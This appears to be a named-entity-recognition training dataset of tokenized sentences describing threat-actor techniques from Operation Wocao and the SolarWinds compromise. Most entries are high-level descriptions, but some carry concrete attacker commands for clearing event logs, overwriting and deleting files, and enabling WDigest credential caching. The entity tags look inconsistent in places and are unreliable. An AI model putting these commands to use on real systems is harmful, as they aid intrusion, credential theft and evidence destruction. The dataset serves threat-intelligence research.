{ - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "archived", - "collected", - "files", - "with", - "WinRAR,", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors'", - "proxy", - "implementation", - "\"Agent\"", - "upgraded", - "the", - "socket", - "in", - "use", - "to", - "a", - "TLS", - "socket." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "a", - "script", - "to", - "collect", - "information", - "about", - "the", - "infected", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "deleted", - "all", - "Windows", - "system", - "and", - "security", - "event", - "logs", - "using", - "`/Q", - "/c", - "wevtutil", - "cl", - "system`", - "and", - "`/Q", - "/c", - "wevtutil", - "cl", - "security`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "collected", - "clipboard", - "data", - "in", - "plaintext." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "executed", - "PowerShell", - "commands", - "which", - "were", - "encoded", - "or", - "compressed", - "using", - "Base64,", - "zlib,", - "and", - "XOR." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "Mimikatz's", - "DCSync", - "to", - "dump", - "credentials", - "from", - "the", - "memory", - "of", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "encrypted", - "IP", - "addresses", - "used", - "for", - "\"Agent\"", - "proxy", - "hops", - "with", - "RC4." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "exfiltrated", - "files", - "and", - "directories", - "of", - "interest", - "from", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "PowerShell", - "to", - "add", - "and", - "delete", - "rules", - "in", - "the", - "Windows", - "firewall." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "the", - "`net`", - "command", - "to", - "retrieve", - "information", - "about", - "domain", - "accounts." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "domain", - "credentials,", - "including", - "domain", - "admin,", - "for", - "lateral", - "movement", - "and", - "privilege", - "escalation." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "B-HackOrg", - "O", - "I-Way", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "registered", - "email", - "accounts", - "to", - "use", - "during", - "the", - "campaign." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "the", - "XServer", - "backdoor", - "to", - "exfiltrate", - "data." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile", - "B-Purp" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "gained", - "initial", - "access", - "by", - "exploiting", - "vulnerabilities", - "in", - "JBoss", - "webservers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "stolen", - "credentials", - "to", - "connect", - "to", - "the", - "victim's", - "network", - "via", - "VPN." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "consistently", - "removed", - "traces", - "of", - "their", - "activity", - "by", - "first", - "overwriting", - "a", - "file", - "using", - "`/c", - "cd", - "/d", - "c:\\windows\\temp\\", - "&", - "copy", - "\\\\<IP", - "ADDRESS>\\c$\\windows\\system32\\devmgr.dll", - "\\\\<IP", - "ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1", - "/y`", - "and", - "then", - "deleting", - "the", - "overwritten", - "file", - "using", - "`/c", - "cd", - "/d", - "c:\\windows\\temp\\", - "&", - "del", - "\\\\<IP", - "ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "gathered", - "a", - "recursive", - "directory", - "listing", - "to", - "find", - "files", - "and", - "directories", - "of", - "interest." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "targeted", - "people", - "based", - "on", - "their", - "organizational", - "roles", - "and", - "privileges." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "edited", - "variable", - "names", - "within", - "the", - "Impacket", - "suite", - "to", - "avoid", - "automated", - "detection." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "downloaded", - "additional", - "files", - "to", - "the", - "infected", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "B-Way", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "proxied", - "traffic", - "through", - "multiple", - "infected", - "systems." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "a", - "Visual", - "Basic", - "script", - "that", - "checked", - "for", - "internet", - "connectivity." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "PowerSploit's", - "`Invoke-Kerberoast`", - "module", - "to", - "request", - "encrypted", - "service", - "tickets", - "and", - "bruteforce", - "the", - "passwords", - "of", - "Windows", - "service", - "accounts", - "offline." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "obtained", - "the", - "password", - "for", - "the", - "victim's", - "password", - "manager", - "via", - "a", - "custom", - "keylogger." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "ProcDump", - "to", - "dump", - "credentials", - "from", - "memory." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "SMB", - "to", - "copy", - "files", - "to", - "and", - "from", - "target", - "systems." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "local", - "account", - "credentials", - "found", - "during", - "the", - "intrusion", - "for", - "lateral", - "movement", - "and", - "privilege", - "escalation." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "staged", - "archived", - "files", - "in", - "a", - "temporary", - "directory", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "the", - "command", - "`net", - "localgroup", - "administrators`", - "to", - "list", - "all", - "administrators", - "part", - "of", - "a", - "local", - "group." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "developed", - "their", - "own", - "custom", - "webshells", - "to", - "upload", - "to", - "compromised", - "servers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "renamed", - "some", - "tools", - "and", - "executables", - "to", - "appear", - "as", - "legitimate", - "programs." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "enabled", - "Wdigest", - "by", - "changing", - "the", - "`HKLM\\SYSTEM\\\\ControlSet001\\\\Control\\\\SecurityProviders\\\\WDigest`", - "registry", - "value", - "from", - "0", - "(disabled)", - "to", - "1", - "(enabled)." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "a", - "custom", - "collection", - "method", - "to", - "intercept", - "two-factor", - "authentication", - "soft", - "tokens." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "executed", - "commands", - "through", - "the", - "installed", - "web", - "shell", - "via", - "Tor", - "exit", - "nodes." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "the", - "`CreateProcessA`", - "and", - "`ShellExecute`", - "API", - "functions", - "to", - "launch", - "commands", - "after", - "being", - "injected", - "into", - "a", - "selected", - "process." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "scanned", - "for", - "open", - "ports", - "and", - "used", - "nbtscan", - "to", - "find", - "NETBIOS", - "nameservers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "discovered", - "network", - "disks", - "mounted", - "to", - "the", - "system", - "using", - "netstat." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "a", - "custom", - "protocol", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "used", - "uncommon", - "high", - "ports", - "for", - "its", - "backdoor", - "C2,", - "including", - "ports", - "25667", - "and", - "47000." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "accessed", - "and", - "collected", - "credentials", - "from", - "password", - "managers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "discovered", - "removable", - "disks", - "attached", - "to", - "a", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "PowerShell", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "Mimikatz", - "to", - "dump", - "certificates", - "and", - "private", - "keys", - "from", - "the", - "Windows", - "certificate", - "store." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "used", - "`tasklist`", - "to", - "collect", - "a", - "list", - "of", - "running", - "processes", - "on", - "an", - "infected", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "injected", - "code", - "into", - "a", - "selected", - "process,", - "which", - "in", - "turn", - "launches", - "a", - "command", - "as", - "a", - "child", - "process", - "of", - "the", - "original." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "a", - "custom", - "proxy", - "tool", - "called", - "\"Agent\"", - "which", - "has", - "support", - "for", - "multiple", - "hops." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors'", - "backdoors", - "were", - "written", - "in", - "Python", - "and", - "compiled", - "with", - "py2exe." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "executed", - "`/c", - "cd", - "/d", - "c:\\windows\\temp\\", - "&", - "reg", - "query", - "HKEY_CURRENT_USER\\Software\\<username>\\PuTTY\\Sessions\\`", - "to", - "detect", - "recent", - "PuTTY", - "sessions,", - "likely", - "to", - "further", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "`nbtscan`", - "and", - "`ping`", - "to", - "discover", - "remote", - "systems,", - "as", - "well", - "as", - "`dsquery", - "subnet`", - "on", - "a", - "domain", - "controller", - "to", - "retrieve", - "all", - "subnets", - "in", - "the", - "Active", - "Directory." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "Impacket's", - "smbexec.py", - "as", - "well", - "as", - "accessing", - "the", - "C$", - "and", - "IPC$", - "shares", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "scheduled", - "tasks", - "to", - "execute", - "malicious", - "PowerShell", - "code", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "scripts", - "to", - "detect", - "security", - "software." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "purchased", - "servers", - "with", - "Bitcoin", - "to", - "use", - "during", - "the", - "operation." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "created", - "services", - "on", - "remote", - "systems", - "for", - "execution", - "purposes." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "collected", - "a", - "list", - "of", - "installed", - "software", - "on", - "the", - "infected", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "discovered", - "the", - "local", - "disks", - "attached", - "to", - "the", - "system", - "and", - "their", - "hardware", - "information", - "including", - "manufacturer", - "and", - "model,", - "as", - "well", - "as", - "the", - "OS", - "versions", - "of", - "systems", - "connected", - "to", - "a", - "targeted", - "network." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "discovered", - "the", - "local", - "network", - "configuration", - "with", - "`ipconfig`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "collected", - "a", - "list", - "of", - "open", - "connections", - "on", - "the", - "infected", - "system", - "using", - "`netstat`", - "and", - "checks", - "whether", - "it", - "has", - "an", - "internet", - "connection." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "enumerated", - "sessions", - "and", - "users", - "on", - "a", - "remote", - "host,", - "and", - "identified", - "privileged", - "users", - "logged", - "into", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "the", - "`tasklist`", - "command", - "to", - "search", - "for", - "one", - "of", - "its", - "backdoors." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "the", - "`time`", - "command", - "to", - "retrieve", - "the", - "current", - "time", - "of", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Wocao,", - "the", - "threat", - "actors", - "obtained", - "a", - "variety", - "of", - "open", - "source", - "tools,", - "including", - "JexBoss,", - "KeeThief,", - "and", - "BloodHound." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "valid", - "VPN", - "credentials", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "VBScript", - "to", - "conduct", - "reconnaissance", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors’", - "XServer", - "tool", - "communicated", - "using", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "used", - "their", - "own", - "web", - "shells,", - "as", - "well", - "as", - "those", - "previously", - "placed", - "on", - "target", - "systems", - "by", - "other", - "threat", - "actors,", - "for", - "reconnaissance", - "and", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "spawned", - "a", - "new", - "`cmd.exe`", - "process", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Wocao,", - "threat", - "actors", - "has", - "used", - "WMI", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "obtained", - "a", - "list", - "of", - "users", - "and", - "their", - "roles", - "from", - "an", - "Exchange", - "server", - "using", - "`Get-ManagementRoleAssignment`." - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "added", - "credentials", - "to", - "OAuth", - "Applications", - "and", - "Service", - "Principals." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "granted", - "`company", - "administrator`", - "privileges", - "to", - "a", - "newly", - "created", - "service", - "principle." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "added", - "their", - "own", - "devices", - "as", - "allowed", - "IDs", - "for", - "active", - "sync", - "using", - "`Set-CASMailbox`,", - "allowing", - "it", - "to", - "obtain", - "copies", - "of", - "victim", - "mailboxes.", - "It", - "also", - "added", - "additional", - "permissions", - "(such", - "as", - "Mail.Read", - "and", - "Mail.ReadWrite)", - "to", - "compromised", - "Application", - "or", - "Service", - "Principals." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "compromised", - "service", - "principals", - "to", - "make", - "changes", - "to", - "the", - "Office", - "365", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - 